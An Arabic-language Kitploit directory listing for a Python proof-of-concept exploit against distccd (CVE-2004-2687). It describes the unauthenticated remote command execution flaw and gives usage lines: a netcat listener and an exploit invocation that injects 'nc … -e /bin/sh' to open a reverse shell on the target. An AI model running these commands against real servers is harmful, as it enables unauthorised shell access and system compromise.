Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
distccd_rce_CVE-2004-2687 — أداة استغلال إثبات المفهوم مبنية بلغة Python لثغرة تنفيذ التعليمات البرمجية عن بعد CVE-2004-2687 في distccd، مما يتيح وصولاً غير مصادق عليه إلى الصدفة على الخوادم الضعيفة. | Kitploit
أدوات/GitHubGitHub/h3x0v3rl0rd/distccd_rce_cve-2004-2687
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالقيادة والسيطرةأداة الوصول عن بعد
GitHubh3x0v3rl0rd/distccd_rce_cve-2004-2687

distccd_rce_CVE-2004-2687

أداة استغلال إثبات المفهوم مبنية بلغة Python لثغرة تنفيذ التعليمات البرمجية عن بعد CVE-2004-2687 في distccd، مما يتيح وصولاً غير مصادق عليه إلى الصدفة على الخوادم الضعيفة.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
2منذ سنة واحدةلم تتم المراجعة بعد

distccd_rce_CVE-2004-2687

🖥️ -h3x0v3rl0rd- #️⃣ CVE-2004-2687 #️⃣ الترقية إلى Python3

نظرة عامة

يحتوي هذا المستودع على إثبات المفهوم (PoC) لاستغلال الثغرة الأمنية في distccd والمعروفة باسم CVE-2004-2687. توجد الثغرة في البرنامج الخفي distccd، وهو جزء من نظام الترجمة الموزعة distcc للغات C/C++. عند تكوينه بشكل غير صحيح، يسمح distccd للمهاجمين عن بُعد بتنفيذ أوامر عشوائية على الخادم دون أي مصادقة. تفاصيل الثغرة

صُمم distcc لتوزيع مهام الترجمة عبر أجهزة متعددة لتسريع عملية البناء. ومع ذلك، إذا لم يتم تأمين البرنامج الخفي distccd بشكل صحيح، فإنه يُظهر ثغرة تنفيذ الأوامر عن بُعد (RCE). يحدث ذلك لأن البرنامج الخفي يستمع على منفذ شبكة ويقبل الأوامر من أي عميل، مما يسمح لهم بتنفيذ أوامر شل على الخادم كمستخدم يدير البرنامج الخفي.

تم تعيين الثغرة CVE-2004-2687 وتؤثر على إصدارات distccd قبل 3.1. عند استغلالها، يمكن للمهاجم الحصول على وصول شل إلى الجهاز المعرض للخطر، مما يؤدي إلى احتمالية اختراق النظام بأكمله.

root@kitploit:~
nc -lvp 4444
python3 distccd_rce.py -t [rhost] -p 3632 -c "nc [localhost] [lport] -e /bin/sh"

الثغرة :

image

الاستغلال :

image

تنزيل الأداة